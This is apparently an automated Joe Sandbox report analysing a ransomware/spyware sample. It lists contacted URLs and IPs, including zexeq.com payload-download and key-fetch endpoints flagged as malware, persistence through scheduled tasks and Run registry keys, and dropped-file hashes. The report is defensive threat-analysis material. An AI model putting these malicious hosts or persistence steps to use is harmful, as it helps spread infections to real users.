https://static.xx.fbcdn.net/rsrc.php/v3/yn/r/A-4As8UDAZ8.js?_nc_x=Ij3Wp8lg5Kz	aafg31.exe, 00000015.00000003.616139527.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.617336652.000001E292381000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.558548528.000001E2922B9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.559523108.000001E29229C000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593963921.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593189980.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E2922CB000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.560301255.000001E29229E000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmp	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/y4/r/ZZnKfYusN8Z.js?_nc_x=Ij3Wp8lg5Kz	aafg31.exe, 00000015.00000003.616139527.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.617336652.000001E292381000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.558548528.000001E2922B9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.559523108.000001E29229C000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593963921.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593189980.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E2922CB000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.560301255.000001E29229E000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmp	false		high
http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.gro	explorer.exe, 00000001.00000000.378821866.00007FFC1B439000.00000002.00000001.01000000.00000005.sdmp	false	URL Reputation: safe	unknown
http://www.amazon.com/	D804.exe, 00000013.00000003.474950384.00000000032B0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://zexeq.com/files/1/build3.exe$run	D804.exe, 00000013.00000002.619178225.0000000000680000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000013.00000002.619178225.00000000006AF000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://www.twitter.com/	D804.exe, 00000013.00000003.475504479.00000000032B0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.openssl.org/support/faq.html	D804.exe, 0000001C.00000002.491035809.0000000002460000.00000040.00001000.00020000.00000000.sdmp	false		high
http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error	D804.exe, 00000005.00000002.442867169.0000000002690000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 00000006.00000002.449975040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, D804.exe, 0000000D.00000002.450667818.0000000002530000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 00000010.00000002.617846506.0000000000400000.00000040.00000400.00020000.00000000.sdmp, D804.exe, 00000012.00000002.451684545.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 00000013.00000002.617779609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, B46F.exe, 00000019.00000002.474131384.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, B46F.exe, 0000001A.00000002.488867120.0000000000400000.00000040.00000400.00020000.00000000.sdmp, A170.exe, 0000001B.00000002.493740298.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 0000001C.00000002.491035809.0000000002460000.00000040.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://static.xx.fbcdn.net/rsrc.php/v3/yT/r/Kp9IMjEGN_T.js?_nc_x=Ij3Wp8lg5Kz	aafg31.exe, 00000015.00000003.616139527.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.617336652.000001E292381000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.558548528.000001E2922B9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.559523108.000001E29229C000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593963921.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593189980.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E2922CB000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.560301255.000001E29229E000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmp	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/yE/r/yWg6mkUCjYR.js?_nc_x=Ij3Wp8lg5Kz	aafg31.exe, 00000015.00000003.616139527.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.617336652.000001E292381000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.558548528.000001E2922B9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.559523108.000001E29229C000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593963921.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593189980.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E2922CB000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.560301255.000001E29229E000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ss.apjeoighw.com/blob:	aafg31.exe, 00000015.00000003.539122814.000001E2901D6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.2ip.ua/geo.jsonq	D804.exe, 00000013.00000003.452681314.0000000000647000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsons	913F.exe, 00000025.00000002.514716181.0000000000667000.00000004.00000020.00020000.00000000.sdmp	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/yq/l/0	aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.644310592.000001E292380000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.616407141.000001E2922D0000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmp	false		high
http://zexeq.com/files/1/build3.exe$runyinstall020921_delay721_sec.exe0	D804.exe, 00000013.00000002.619178225.00000000006AF000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://zexeq.com/raud/get.php?pid=F4B58C92E14ED1DB6A495C4F011280Nkx%	D804.exe, 00000010.00000002.619429561.0000000000891000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.nytimes.com/	D804.exe, 00000013.00000003.475283762.00000000032B0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/yE/l/0	aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.644310592.000001E292380000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.616407141.000001E2922D0000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/	B46F.exe, 0000001A.00000002.489404633.0000000000687000.00000004.00000020.00020000.00000000.sdmp, A170.exe, 0000001D.00000003.488086932.0000000000939000.00000004.00000020.00020000.00000000.sdmp, A170.exe, 0000001D.00000002.490407985.0000000000939000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t.me/looking_glassboeL	build2.exe, 00000018.00000002.478487593.00000000008C8000.00000040.00000020.00020000.00000000.sdmp	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/_tJ17sGyx	aafg31.exe, 00000015.00000003.617144495.000001E292287000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.643446636.000001E29228C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.json#&	D804.exe, 00000010.00000003.452471512.0000000000851000.00000004.00000020.00020000.00000000.sdmp	false		high
https://freebl3.dllmozglue.dllmsvcp140.dllnss3.dllsoftokn3.dllvcruntime140.dll	build2.exe, 00000018.00000002.478126519.0000000000840000.00000040.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ss.apjeoighw.com:80/check/?sid=436234&key=2cef0d99b721939135d08fea0dcaba52G_	aafg31.exe, 00000015.00000003.569051255.000001E2901A6000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.566066441.000001E2901A6000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.563228419.000001E2901A6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.xx.fbcdn.net/rsrc.php/v3/ye/r/sczXDyPA0UL.js?_nc_x=Ij3Wp8lg5Kz	aafg31.exe, 00000015.00000003.616139527.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.617336652.000001E292381000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.558548528.000001E2922B9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.559523108.000001E29229C000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593963921.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593189980.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E2922CB000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.560301255.000001E29229E000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.wikipedia.com/	D804.exe, 00000013.00000003.475541394.00000000032B0000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://we.tl/t-tnzomMj6HU	D804.exe, 00000010.00000002.619429561.0000000000891000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000013.00000002.636070288.00000000031DB000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000013.00000002.619178225.0000000000680000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000013.00000002.619178225.00000000006AF000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://static.xx.fbcdn.net/rsrc.php/v3i7M54/yx/l/en_US/LsRZeEzcd6B.js?_nc_x=Ij3Wp8lg5Kz	aafg31.exe, 00000015.00000003.616139527.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.617336652.000001E292381000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.558548528.000001E2922B9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.559523108.000001E29229C000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593963921.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593189980.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E2922CB000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.560301255.000001E29229E000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.live.com/	D804.exe, 00000013.00000003.475244622.00000000032B0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://zexeq.com/files/1/build3.exerunb10	D804.exe, 00000013.00000002.619178225.000000000062B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://zexeq.com/raud/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806Cg	D804.exe, 00000010.00000002.619429561.0000000000852000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
157.240.9.35	star-mini.c10r.facebook.com	United States	32934	FACEBOOKUS	false
103.100.211.218	jp.imgjeoighw.com	Hong Kong	133115	HKKFGL-AS-APHKKwaifongGroupLimitedHK	true
154.221.31.191	ss.apjeoighw.com	Seychelles	133115	HKKFGL-AS-APHKKwaifongGroupLimitedHK	false
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false
217.174.148.28	speedlab.com.eg	Bulgaria	31083	TELEPOINTBG	true
175.119.10.231	zexeq.com	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
211.40.39.251	unknown	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	true
157.240.17.17	star.c10r.facebook.com	United States	32934	FACEBOOKUS	false
211.119.84.112	colisumy.com	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	true
162.0.217.254	api.2ip.ua	Canada	35893	ACPCA	false
194.180.48.90	unknown	Germany	10753	LVLT-10753US	true
123.140.161.243	unknown	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	true
80.66.203.53	shsplatform.co.uk	United Kingdom	61323	UKFASTGB	true
188.34.154.187	unknown	Germany	24940	HETZNER-ASDE	false
45.9.74.80	unknown	Russian Federation	200740	FIRST-SERVER-EU-ASRU	true
211.59.14.90	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
188.114.97.7	potunulit.org	European Union	13335	CLOUDFLARENETUS	true
188.114.96.7	unknown	European Union	13335	CLOUDFLARENETUS	true
183.100.39.157	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	true
157.240.234.35	unknown	United States	32934	FACEBOOKUS	false
222.236.49.123	toobussy.com	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
222.236.49.124	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	37.1.0 Beryl
Analysis ID:	876998
Start date and time:	2023-05-28 10:41:06 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 49s
Hypervisor based Inspection enabled:	false
Report type:	light
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	43
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	01860199.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@76/330@105/23
EGA Information:	Failed
HDC Information:	Successful, ratio: 45.2% (good quality ratio 38.6%) Quality average: 61.8% Quality standard deviation: 35.8%
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, dllhost.exe, consent.exe, conhost.exe, svchost.exe
TCP Packets have been reduced to 100
Created / dropped Files have been reduced to 100
Excluded IPs from analysis (whitelisted): 13.89.179.12, 20.189.173.22, 20.42.73.29, 20.189.173.21
Excluded domains from analysis (whitelisted): login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, onedsblobprdwus17.westus.cloudapp.azure.com, onedsblobprdwus16.westus.cloudapp.azure.com, watson.telemetry.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:42:01	API Interceptor	556x Sleep call for process: explorer.exe modified
10:42:34	Task Scheduler	Run new task: Firefox Default Browser Agent 1D1CF5D964ED7B3F path: C:\Users\user\AppData\Roaming\hwgujdv
10:42:40	Task Scheduler	Run new task: Time Trigger Task path: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe s>--Task
10:42:43	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe" --AutoStart
10:42:45	API Interceptor	1x Sleep call for process: D804.exe modified
10:42:46	API Interceptor	1x Sleep call for process: WerFault.exe modified
10:42:53	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe" --AutoStart
10:42:55	Task Scheduler	Run new task: Azure-Update-Task path: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
10:42:58	Task Scheduler	Run new task: mnolyk.exe path: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe
10:42:59	API Interceptor	571x Sleep call for process: mnolyk.exe modified
10:43:09	API Interceptor	1x Sleep call for process: build2.exe modified
10:43:20	Task Scheduler	Run new task: Firefox Default Browser Agent A259CA271F5868C4 path: C:\Users\user\AppData\Roaming\ewgujdv
10:43:34	API Interceptor	1x Sleep call for process: aafg31.exe modified
10:43:50	Task Scheduler	Run new task: NoteUpdateTaskMachineQC path: C:\Program Files\Notepad\Chrome\updater.exe

Process:	C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, file counter 7, database pages 36, 1st free page 10, free pages 1, cookie 0x29, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	147456
Entropy (8bit):	0.7217007190866341
Encrypted:	false
SSDEEP:	384:kab+d5neKTnuRpHDiEwABBE3umab+QuJdi:kab+dVeK8iEZBBjmab+QuJdi
MD5:	FEF7F4B210100663DC7731400BAC534E
SHA1:	E3F17C46A2DB6861F22B3F4222B97DCB5EBBD47A
SHA-256:	E81118F5C967EA342A16BDEFB28919F8039E772F8BDCF4A65684E3F56D31EA0E
SHA-512:	6134CC2118FBADD137C4FC3204028B088C7E73A7B985A64D84C60ABD5B1DBFD0AA352C6DF199F43164FEC92378571B5FAC4F801E9AF7BE1DEA8FB6C3C799F695
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......$...........)......................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8205242041362858
Encrypted:	false
SSDEEP:	96:eJxorFzUelJoWKixCto07RP6tpXIQcQjc6ieAcElcw3K+HbHg/8BRTf3o8Fa9iVi:1ZUeliWKGHtGZvPjIg/u7sXS274ItL
MD5:	630663FB4548437CAB9B71A117392776
SHA1:	428A1A4ED05F4C140B589DE9E5CE379E77A23A44
SHA-256:	35B2CB67E341CE0D02B479C13C3822EACA1BF1ABE1174D1807E0DB09B4E7EDAC
SHA-512:	5FD2F30697D0CC13887EBF452770A2FCB7AD761F61D4786F9509F932EE1ECD7EF146C4954C55D75ACC2D29BA11CCFEC03416B88AD861C5183E1CA104AE50CFB1
Malicious:	false
Reputation:	unknown
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.2.9.7.6.9.3.5.9.9.6.3.5.0.9.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.2.9.7.6.9.3.6.0.8.0.7.2.6.2.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.d.8.3.7.3.3.b.-.a.2.b.6.-.4.f.8.b.-.a.4.a.c.-.f.9.4.3.a.4.c.d.6.e.c.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.4.9.4.b.5.0.f.-.4.6.b.a.-.4.a.a.1.-.a.7.7.5.-.3.0.a.a.7.c.6.0.2.f.3.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.C.8.6.1...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.0.4.4.-.0.0.0.1.-.0.0.1.f.-.3.1.0.f.-.c.0.c.b.8.b.9.1.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.a.c.b.e.e.1.8.2.b.3.e.b.b.4.c.3.e.8.b.b.8.c.2.b.a.d.d.e.1.1.1.0.0.0.0.f.b.0.2.!.0.0.0.0.2.d.f.f.9.4.4.f.9.7.0.f.a.e.f.5.c.6.f.a.9.2.a.c.8.f.b.e.8.2.c.9.2.5.1.5.5.3.f.3.!.C.8.6.1...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.0.3././.1.3.:.

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	288768
Entropy (8bit):	6.584915706285476
Encrypted:	false
SSDEEP:	3072:tiaWGvA5BMvdYuAJ2qiGD0swth9Ewaf/s7htn5gYTtic7:t4GvAMdj40th7a3s7SYTtic
MD5:	7A8E3D000FBA0F5765B98E2D78EB9D12
SHA1:	2DFF944F970FAEF5C6FA92AC8FBE82C9251553F3
SHA-256:	13744BE5698FFDDC96D55415FDEEBDE4921ED199B4174251D83F1FD5B5A05C66
SHA-512:	1D56B0DD129D7A1C1E76B110F9CEE4C63D2F021BCDCACA53CD780CC5E6B6CAFD6CEBC70FB62198910CAE2E4E9EA083216611923C72A4120FCC30CA3894A058DA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&...b...b...b...\|.......\|.......\|...H...EX..k...b.....\|...c...\|...c...\|...c...Richb...................PE..L...G..c.................~..."&.....YN............@...........................(.................................................d.....&.......................(..... ...............................P1..@............................................text....}.......~.................. ..`.data...DX$.........................@....rsrc.........&.....................@..@.reloc...3....(..4...4..............@..B........................................................................................................................................................................................................................................................................................................................................................................

Entrypoint:	0x404e59
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x63859465 [Tue Nov 29 05:11:01 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	2d9ed3462f8a74bfd1231e2e9de56b43

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x284b8	0x64	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x26f000	0x19398	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x289000	0xde4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1220	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x3150	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1d4	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x27f7a	0x28000	False	0.786663818359375	data	7.582759753211569	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x29000	0x245844	0x1e00	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x26f000	0x19398	0x19400	False	0.3791963180693069	data	4.260273203195652	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x289000	0x332e	0x3400	False	0.22581129807692307	data	2.52425334561387	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type
RT_ICON	0x26f730	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0
RT_ICON	0x2705d8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0
RT_ICON	0x270e80	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0
RT_ICON	0x273428	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0
RT_ICON	0x2744d0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0
RT_ICON	0x274988	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0
RT_ICON	0x275830	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0
RT_ICON	0x2760d8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0
RT_ICON	0x276640	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0
RT_ICON	0x278be8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0
RT_ICON	0x279c90	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0
RT_ICON	0x27a618	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0
RT_ICON	0x27aae8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0
RT_ICON	0x27b990	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0
RT_ICON	0x27c238	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0
RT_ICON	0x27c900	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0
RT_ICON	0x27ce68	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0
RT_ICON	0x27f410	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0
RT_ICON	0x2804b8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0
